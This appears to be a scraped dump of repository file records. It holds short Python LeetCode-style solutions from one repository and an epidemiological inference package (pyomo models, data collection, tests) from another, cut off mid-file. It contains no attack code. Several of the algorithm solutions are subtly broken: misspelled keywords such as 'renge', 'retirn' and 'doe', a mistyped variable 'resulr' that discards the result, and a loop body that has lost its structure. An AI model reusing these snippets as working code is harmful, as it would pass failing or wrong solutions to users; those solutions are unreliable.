"avg_line_length": 22.733333587646484, "blob_id": "8cec1c06ea524af42e77cacdb5ec2afb3cfefc10", "content_id": "9070255361f19ef3cf0269db84f60725247fe2de", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 358, "license_type": "permissive", "max_line_length": 76, "num_lines": 15, "path": "/Part4/Sum_Root_To_LEaf_Numbers.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef sumNumbers(self, root):\n\t\treturn self._sumNumbers(root, 0)\n\n\tdef _sumNumbers(self, root, s):\n\t\tif root is None:\n\t\t\treturn 0\n\t\ts = s* 10 + root.val\n\t\treturn sum([self._sumNumbers(r, s) for r in (root.left, root.right)]) or s\n\t\t" }, { "alpha_fraction": 0.5456919074058533, "alphanum_fraction": 0.5691906213760376, "avg_line_length": 23, "blob_id": "c333c06b2dcf0590c2031ca6a10ff4cd0d5dfc6d", "content_id": "887f0c6fc08a17a9246b6e1ad8a03c53bd7a70ee", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "permissive", "max_line_length": 71, "num_lines": 16, "path": "/Part4/Unique_Paths.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "import math\nclass Solution(object):\n\tdef uniquePaths(self, m, n):\n\t\tm -= 1\n\t\tn -= 1\n\t\treturn math.factorial(m + n)/ (math.factorial(n) * math.factorial(m))\n\n\n\nclass _Solution(object):\n\tdef _uniquePaths(self, m, n):\n\t\tdp = [[1 for __ in range(n)] for __ in range(m)] \n\t\tfor i in range(1, n):\n\t\t\tdoe j in range(1, m):\n\t\t\tdp[j][i] = dp[j - 1][i] + dp[j][i - 1]\n\t\treturn dp[m - 1][n - 1]" }, { "alpha_fraction": 0.6329966187477112, "alphanum_fraction": 0.6447811722755432, "avg_line_length": 30.3157901763916, "blob_id": "07eac563603c5d42414685b2220d8c2531e2982f", "content_id": "45bfb911b8ff38ac873501da25e0e6df9c6b140c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 594, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/Part2/Best_Time_To_Buy_And_Sell_Stock_3.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Subject(object):\n\tdef maxProfit(self, prices):\n\t\ttotal_max_profit = 0\n\t\tn = len(prices)\n\t\tfirst_profits = [0] * n\n\t\tmin_price = float('inf')\n\n\t\tfor i in range(n):\n\t\t\tmin_price = min(min_price, prices[i])\n\t\t\ttotal_max_profit = max(total_max_profit, prices[i] - min_price)\n\t\t\tfirst_profits[i] = total_max_profit\n\n\t\tmax_profit = 0\n\t\tmax_price = float('-inf')\n\t\tfor i in range(n - 1, 0, -1):\n\t\t\tmax_price = max(max_price, prices[i])\n\t\t\tmax_profit = max(max_profit, max_price - prices[i])\n\t\t\ttotal_max_profit = max(total_max_profit, max_profit + first_profits[i - 1])\n\t\treturn total_max_profit" }, { "alpha_fraction": 0.5951219797134399, "alphanum_fraction": 0.6146341562271118, "avg_line_length": 24.375, "blob_id": "a192dec2f2ddf334b5b0bcc54f4f2dee5695edcd", "content_id": "76d19199d5f1fb67be9cc61d9e4a2fab91a3a818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/Part1/Remove_Duplicates_From_Sorted_Array_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef removeDuplicates(self, nums):\n\t\tcount = 0\n\t\tfor i in renge(len(nums)):\n\t\t\tif count < 2 or nums[count - 2] != nums[i]:\n\t\t\t\tnums[count] = nums[i]\n\t\t\t\tcount += 1\n\t\treturn count\n\t\t" }, { "alpha_fraction": 0.4272445738315582, "alphanum_fraction": 0.49226006865501404, "avg_line_length": 28.454545974731445, "blob_id": "65adebdb912ba57e39e849964d48a3e7f9b39256", "content_id": "eaee6dc32f9df90e182925d4c430e8a9996299b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 323, "license_type": "no_license", "max_line_length": 74, "num_lines": 11, "path": "/Part3/Roman_To_Integer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef romanToInt(self, s):\n\t\tmap = {\"M\" : 1000, \"D\": 500, \"C\": 100, \"L\": 50, \"X\": 10, \"V\": 5, \"I\": 1}\n\t\tresult = 0\n\t\tfor i in range(len(s)):\n\t\t\tif i > 0 and map[s[i]] > map[s[i - 1]]:\n\t\t\t\tresult -= map[s[i - 1]]\n\t\t\t\tresult += map[s[i]] - map[s[i - 1]]\n\t\t\telse:\n\t\t\t\tresult += map[s[i]]\n\t\treturn result" }, { "alpha_fraction": 0.5596708059310913, "alphanum_fraction": 0.5802469253540039, "avg_line_length": 23.100000381469727, "blob_id": "988ac6aa8a16cc9e95f802339f3630158e424ed8", "content_id": "27d0b1dc91dee0e39c3b2ac1022753e46958c672", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/Part2/Length_Of_Last_Word.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef lengthofLastWord(self, s):\n\t\tlength = len(s)\n\t\tindex = length - 1\n\t\twhile index >= 0 and s[index] == \" \":\n\t\t\tindex -= 1\n\t\ttemp = index\n\t\twhile index >= 0 and s[index] != \" \":\n\t\t\tindex -= 1\n\t\treturn temp - index\n\t\t" }, { "alpha_fraction": 0.5420875549316406, "alphanum_fraction": 0.5656565427780151, "avg_line_length": 20.285715103149414, "blob_id": "f47a3dfd148437cff20c89c00dfbd619bb3216ba", "content_id": "45de7eb145487a8627eb32f7905c36941e341e1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/Part1/Rotate_Array.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef rotate(self, nums, k):\n\n\t\tdef reverse(nums,start, end):\n\t\t\twhile start <end:\n\t\t\t\tnums[start], nums[end] = nums[end], nums[start]\n\t\t\t\tstart += 1\n\t\t\t\tend -= 1\n\n\t\tn = len(nums)\n\t\tk %= n\n\t\treverse(nums, 0, n - k - 1)\n\t\treverse(nums, n - k, n - 1)\n\t\treverse(nums, 0, n - 1)" }, { "alpha_fraction": 0.5733944773674011, "alphanum_fraction": 0.5917431116104126, "avg_line_length": 17, "blob_id": "6699e9af79c8ce73c973b26187b9cdd3c7eb9771", "content_id": "098cc5b1fee19e2455fd3c32d0ad5911b33a69bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 33, "num_lines": 12, "path": "/Part1/Majority_Element.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef majorityElement(self, nums):\n\t\tresult = None\n\t\tcount = 0\n\t\tfor num in nums:\n\t\t\tif count == 0:\n\t\t\t\tresult = num\n\t\t\tif result == num:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tcount -= 1\n\t\tretirn result\n\t\t" }, { "alpha_fraction": 0.5414141416549683, "alphanum_fraction": 0.5696969628334045, "avg_line_length": 23.649999618530273, "blob_id": "04160fd43fcf4a1cccde848fb04879937942c53b", "content_id": "bdee5b8fd5f26e3ef82dfd768146de0de66eefaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 495, "license_type": "no_license", "max_line_length": 55, "num_lines": 20, "path": "/Part2/Maxmial_Rectangle.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maximalRectangel(self, matrix):\n\t\tif not matrix or not matrix[0]:\n\t\t\treturn 0\n\n\t\tn = len(matrix[0])\n\t\theights = [0 for __ in range(n + 1)]\n\t\tresult = 0\n\t\tfor row in matrix:\n\t\t\tfor i in range(n):\n\t\t\t\theights[i] = heights[i] + 1 if row[i] == '1' else 0\n\t\t\tstack = [-1]\n\t\t\tfor i in range(n + 1):\n\t\t\t\twhile heights[i] < heights[stack[-1]]:\n\t\t\t\t\th = heights[stack.pop()]\n\t\t\t\t\tw = i - stack[-1] - 1\n\t\t\t\t\tresulr = max(result, h * w)\n\n\t\t\t\tstack.append(i)\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6433120965957642, "alphanum_fraction": 0.6433120965957642, "avg_line_length": 24.83333396911621, "blob_id": "6d840ad6f15af08bae59eeceb0549c3bb57355fa", "content_id": "0d6837d298e583120d4f214df015904cd1f5ec11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 45, "num_lines": 6, "path": "/Part2/Subsets.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef subsets(self, nums):\n\t\tresult = [[]]\n\t\tfor num in sorted(nums):\n\t\t\tresult += [item +[num] for item in result]\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6180811524391174, "alphanum_fraction": 0.6217712163925171, "avg_line_length": 19.769229888916016, "blob_id": "440bd380979c706f8a4ecd21f3229c0639492727", "content_id": "9a2f9855d92993e6c90e9a87e5ac761387192732", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 542, "license_type": "no_license", "max_line_length": 70, "num_lines": 26, "path": "/Part1/Reverse_Linked_List_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\n\tdef to_list(self):\n\t\treturn [self.val] + self.next.to_list() if self.next else [self.val]\n\nclass Solution(object):\n\tdef reverseBetween(self, head, m, n):\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tnode = dummy\n\t\tfor __ in range(m - 1):\n\t\t\tnode = node.next\n\n\t\tprev = node.next\n\t\tcurr = prev.next\n\t\tfor __ in range(n - m):\n\t\t\tnext = curr.next\n\t\t\tcurr.next = prev\n\t\t\tprev = curr\n\t\t\tcurr = next\n\t\tnode.next.next = curr\n\t\tnode.next = prev\n\t\treturn dummy.next\n\t\t" } ]
103
or-fusion/epi_inference
https://github.com/or-fusion/epi_inference
b6192f1b6e7687da22983dc955d890703e622684
d3c691960ffae74ef998050efe1dbd70f22e39f3
5485155698e9b016a55ae2c6d78e659ee9e8231f
refs/heads/master
2023-08-31T22:22:54.480859
2020-07-27T14:33:24
2020-07-27T14:33:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.596528172492981, "alphanum_fraction": 0.5970541834831238, "avg_line_length": 32.33333206176758, "blob_id": "872bb5fe7534b8f33c03a420f774c60ef887b886", "content_id": "340d71ea81a72ad7a5488333dc3d0ad55db359a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1901, "license_type": "no_license", "max_line_length": 157, "num_lines": 57, "path": "/epi_inference/collect/casedata_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport pandas as pd\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom .load_results import load_df_casedata\nfrom .misc import save_collect\n\n\ndef run(CONFIG, warnings):\n #\n # Process county case data. We assume that data is organized within\n # a single directory, where each CSV file reports case data for a single\n # county. See the epi_inference/examples/countydata directory structure for\n # an example.\n #\n df = load_df_casedata(CONFIG[\"files\"],\n datadir=CONFIG[\"dir\"],\n datacol=CONFIG.get(\"column\", None),\n days_before_first=CONFIG.get(\"days_before_first\", None),\n days_after_first=CONFIG.get(\"days_after_first\",None))\n\n if df is None: # pragma: no cover\n print(\"ERROR: no case data loaded\")\n sys.exit(1)\n if CONFIG['verbose']:\n print(\"Data Summary\")\n print(df)\n print(\"\")\n\n save_collect(CONFIG['output'], df, CONFIG['verbose'], warnings)\n save_metadata(CONFIG, warnings)\n\n\nclass CollectCaseData(Task):\n\n def __init__(self):\n Task.__init__(self, \"casedata\",\n \"Collect case data into a single CSV file for reconstruction and inference.\")\n\n def validate(self, CONFIG):\n valid_options = set(['files', 'dir', 'column', 'days_before_first', 'days_after_first', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run(CONFIG, self._warnings)\n\n\nregister_task(CollectCaseData())\n\n" }, { "alpha_fraction": 0.6175838708877563, "alphanum_fraction": 0.6255255341529846, "avg_line_length": 39.6920166015625, "blob_id": "e7d5c710d1e180e84d485ea2cf458f4a1a1065a5", "content_id": "f6c40b0bad8bdf81b07266d88c9545c3ae3ad7f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10703, "license_type": "no_license", "max_line_length": 220, "num_lines": 263, "path": "/epi_inference/formulations/attic/multinode_mobility_time_varying_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom . import reconstruction as recon\nimport pyutilib.misc.timing as timing\nimport json\nimport matplotlib.pyplot as plt\n\ndef run_multinode_mobility_time_varying_decay_lsq(cm_rep_cases, populations, mobility, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n for i in [-1]: #range(-6,2):\n # create the Pyomo optimization formulation\n regu = 1*10**i\n m = create_inference_regu_formulation(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n mobility=mobility,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n delta_beta_regu=regu,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=True) #verbose)\n m.display()\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = dict()\n results['date'] = [m.DATES[t] for t in m.TIMES]\n for i in m.NODES:\n betas = list()\n transmissions = 0\n for t in m.TIMES:\n transmissions += m.T_data[i][t]\n if transmissions < 20:\n betas.append(None)\n else:\n betas.append(pe.value(m.beta[i,t]))\n results[i] = betas\n\n df = pd.DataFrame(results)\n print(df)\n pd.set_option('display.max_rows', None)\n print(df.std())\n df.plot(x='date')\n plt.show()\n\n return {'results': results}\n\n \"\"\" OLD RESULTS STRUCTURE\n # build the dictionary of results\n betas = list()\n wdates = list()\n status = list()\n fips = list()\n pops = list()\n est_transmissions = list()\n window_days = list()\n for i in m.NODES:\n for w in m.WINDOWS:\n wdates.append(m.DATES[w])\n fips.append(i)\n pops.append(populations[i])\n est_transmissions.append(m.window_transmissions[i][w])\n window_days.append(m.window_days)\n if m.beta[i,w].stale == True or m.window_transmissions[i][w] <= 2:\n status.append('invalid_insufficient_data')\n betas.append(None)\n else:\n status.append('ok')\n betas.append(value(m.beta[i,w])) \n\n ret = {'dates': wdates, 'est_beta':betas, 'status':status, 'population': pops, 'est_transmissions':est_transmissions, 'window_days': window_days, 'FIPS':fips}\n #df = pd.DataFrame(ret)\n #df.to_csv('foo.csv')\n return ret\n \"\"\"\n\ndef create_inference_regu_formulation(Cdates, cumulative_reported_cases, populations, mobility, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, delta_beta_regu, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n if len(analysis_window) != 0:\n raise NotImplementedError('analysis_window is not yet implemented for multinode_decay_lsq')\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.eta = 0.5 # fraction of the day spent \"away\"\n model.report_delay = report_delay\n model.reporting_factor = reporting_factor\n model.delta_beta_regu = delta_beta_regu\n\n #model.NODES = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n model.NODES = pe.Set(initialize=list(k for k in cumulative_reported_cases.keys()))\n\n model.mobility = dict(mobility)\n model.MOBILITY_TUPLES = list()\n #model.mobility = dict()\n for i in model.NODES:\n if i not in model.mobility:\n model.mobility[i] = {}\n for j in model.mobility[i]:\n if i in model.NODES and j in model.NODES:\n model.MOBILITY_TUPLES.append((i,j))\n model.populations = dict()\n \n model.T_data = dict()\n model.I_data = dict()\n model.S_data = dict()\n for nodeid in model.NODES:\n model.populations[nodeid] = float(populations[nodeid]) # overall population\n cm_rep_cases_node = [v for v in cumulative_reported_cases[nodeid].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=model.populations[nodeid],\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n model.T_data[nodeid] = T\n model.I_data[nodeid] = dict()\n model.I_data[nodeid]['I1'] = I1\n model.I_data[nodeid]['I2'] = I2\n model.I_data[nodeid]['I3'] = I3\n model.S_data[nodeid] = S\n \n if not hasattr(model, 'TIMES'):\n model.TIMES = pe.Set(initialize=[i for i in range(len(T))], ordered=True)\n if not hasattr(model, 'DATES'):\n model.DATES = dates\n\n model.beta = pe.Var(model.NODES, model.TIMES, initialize=1.0, bounds=(0,None)) # transmission parameter\n # for now, alpha is not used\n # model.alpha = pe.Var(initialize=1.0)\n # model.alpha.fix(1.0)\n\n # define the variable for estimated transmissions\n model.T_hat = pe.Var(model.NODES, model.TIMES, initialize=1.0)\n # infection process\n def _infection_process(m, i, t):\n percent_mobile = 0\n if i in m.mobility:\n percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i] if j in m.NODES)\n\n return m.T_hat[i,t] == m.beta[i,t] * (m.I_data[i]['I1'][t] + m.I_data[i]['I2'][t] + m.I_data[i]['I3'][t]) / m.populations[i] * m.S_data[i][t] * (1-m.eta*percent_mobile) \\\n + sum(m.beta[j,t] * (m.I_data[j]['I1'][t] + m.I_data[j]['I2'][t] + m.I_data[j]['I3'][t]) / m.populations[j] * m.S_data[i][t] * (m.eta*m.mobility[i][j]/m.populations[i]) for j in m.mobility[i] if j in m.NODES)\n\n model.infection_process = pe.Constraint(model.NODES, model.TIMES, rule=_infection_process)\n\n model.delta_beta = pe.Var(model.NODES, model.TIMES, initialize=0)\n def _delta_beta_con(m, i, t):\n if t == m.TIMES.first():\n return pe.Constraint.Skip\n return m.delta_beta[i,t] == m.beta[i,t] - m.beta[i,t-1]\n model.delta_beta_con = pe.Constraint(model.NODES, model.TIMES, rule=_delta_beta_con)\n\n # least squares objective function\n def _lse(m):\n return sum( (m.T_hat[i,t] - m.T_data[i][t])**2 for i in m.NODES for t in m.TIMES)\n model.lse = pe.Expression(rule=_lse)\n\n def _regu(m):\n return sum(m.delta_beta[i,t]**2 for i in m.NODES for t in m.TIMES)\n model.regu = pe.Expression(rule=_regu)\n \n def _total_lse(m):\n return m.lse + m.delta_beta_regu * m.regu\n model.total_lse = pe.Objective(rule=_total_lse)\n\n return model\n\n" }, { "alpha_fraction": 0.6912838220596313, "alphanum_fraction": 0.7129669189453125, "avg_line_length": 55.10843276977539, "blob_id": "54a21b507eeadef5b86d3f2ded6e9c7d1695b79b", "content_id": "f41c980703637becf1b71fe08cf9dfa734f27d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4658, "license_type": "no_license", "max_line_length": 188, "num_lines": 83, "path": "/epi_inference/formulations/tests/test_inference_workflows.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport shutil\n\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\nfrom epi_inference.engine import driver\nfrom epi_inference.util import compare_json\n\ntry:\n import poek\n poek_available=True\nexcept:\n poek_available=False\n\nclass TestInference():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_mobility_window(self):\n args = Options()\n args.block = 'mobility_windows'\n args.config_file = './config_files/tests1.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files match their baselines\n compare_json('./output/tests1_inference_unsampled_countydata1_all.json', './baseline/tests1_inference_unsampled_countydata1_all.json')\n\n compare_json('./output/tests1_inference_unsampled_countydata1_all_new.json', './baseline/tests1_inference_unsampled_countydata1_all.json')\n compare_json('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all.json',\n abs_tol=1e-3, skip_keys=['days_since_first_reported', 'reported_cases_over_window', 'infectious_pop_over_window', 'transmissions_over_window'])\n compare_json('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json', abs_tol=1e-3)\n \n # cleanup the files we created\n os.remove('./output/tests1_inference_unsampled_countydata1_all.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_new.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_new_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative_meta.yml')\n\n @pytest.mark.skip('Skipping test because \"poek\" is not installed.')\n def test_mobility_window_poek(self):\n args = Options()\n args.block = 'mobility_windows_poek'\n\n # check that the json files match their baselines\n compare_json('./output/tests1_inference_unsampled_countydata1_all_poek.json', './baseline/tests1_inference_unsampled_countydata1_all.json')\n\n # cleanup the files we created\n os.remove('./output/tests1_inference_unsampled_countydata1_all_poek.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_poek_meta.yml')\n\n def test_select_mobility_window(self):\n # run a collection of data for 24031\n args = Options()\n args.block = 'select_mobility_windows'\n args.config_file = './config_files/tests1.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_last.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last.json')\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_20200404.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last.json')\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last.json',\n abs_tol=1e-3, skip_keys=['days_since_first_reported', 'reported_cases_over_window', 'infectious_pop_over_window', 'transmissions_over_window'])\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last_iterative.json')\n \n # cleanup the files we created\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_20200404.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_20200404_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative_meta.yml')\n\n" }, { "alpha_fraction": 0.6065062284469604, "alphanum_fraction": 0.6100713014602661, "avg_line_length": 29.72602653503418, "blob_id": "70659c8587db30e68207056b2763aab2a9ffec51", "content_id": "48d55120d16f6b61e1eba51c60d5dfe267661ecc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2244, "license_type": "no_license", "max_line_length": 128, "num_lines": 73, "path": "/epi_inference/formulations/inference_json2csv_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run', 'inference_json2csv']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef inference_json2csv(input_json, output_csv=None, datadir=None):\n if datadir:\n full_infile = os.path.join(datadir, input_json)\n else:\n full_infile = input_json\n if not os.path.exists(full_infile):\n raise RuntimeError(\"ERROR: Inference JSON file does not exist: \"+ full_infile)\n #\n print(\"Processing inference file: \"+full_infile)\n with open(full_infile,'r') as INPUT:\n raw = json.load(INPUT)\n\n # Figure out CSV output filename\n if output_csv:\n pass\n elif input_json.endswith('jsn'):\n output_csv = input_json[:-4]+\".csv\"\n elif input_json.endswith('json'):\n output_csv = input_json[:-5]+\".csv\"\n else:\n raise RuntimeError(\"ERROR: Cannot infer CSV output file name\")\n if datadir:\n full_outfile = os.path.join(datadir,output_csv)\n else:\n full_outfile = output_csv\n\n # Write CSV file\n print(\"Writing results summary: \"+full_outfile)\n with open(full_outfile,'w') as OUTPUT:\n sorted_fips = list(sorted(raw.keys()))\n OUTPUT.write(\"FIPS,Date,Beta,Status\\n\")\n for fips in sorted_fips:\n for d in range(len(raw[fips]['date'])):\n if raw[fips]['beta'][d] is None:\n OUTPUT.write('\"%s\",%s,,%s\\n' % (fips, raw[fips]['date'][d], raw[fips]['status'][d]))\n else:\n OUTPUT.write('\"%s\",%s,%f,%s\\n' % (fips, raw[fips]['date'][d], raw[fips]['beta'][d], raw[fips]['status'][d]))\n\n\ndef run(CONFIG, warnings):\n inference_json2csv(CONFIG['input_json'], output_csv=CONFIG.get('output_csv',None), datadir=CONFIG.get('datadir',None))\n\n\nclass Inference_JSON2CSV_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"inference_json2csv\",\n \"Convert inference JSON to CSV.\")\n\n def run(self, data, CONFIG):\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(Inference_JSON2CSV_Workflow())\n\n" }, { "alpha_fraction": 0.5433740615844727, "alphanum_fraction": 0.5526000261306763, "avg_line_length": 34.35593032836914, "blob_id": "889401857b3cfcb5f1a889d6b03674fe0f362c30", "content_id": "01a2d33ae36933e9eba4b7907172f6083ed037ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8346, "license_type": "no_license", "max_line_length": 160, "num_lines": 236, "path": "/epi_inference/collect/load_results.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "\nimport sys\nimport os\nimport pandas as pd\nimport glob\nimport importlib\n\n\n\"\"\"\nTODO - delete?\n\n\nprefix=\"around_md_sim_\"\n\ndef load_results(expdir=None, expnum=1, trial=0, county=\"24031\", threshold=0, start=0, stop=None, days_before_first=None, days_after_first=None, verbose=False):\n if verbose:\n print('load_results:', expdir, 'exp'+str(expnum), prefix+str(trial)+\"_scn_\"+county+\".csv\")\n filename=os.path.join(expdir, 'exp'+str(expnum), prefix+str(trial)+\"_scn_\"+county+\".csv\")\n if not 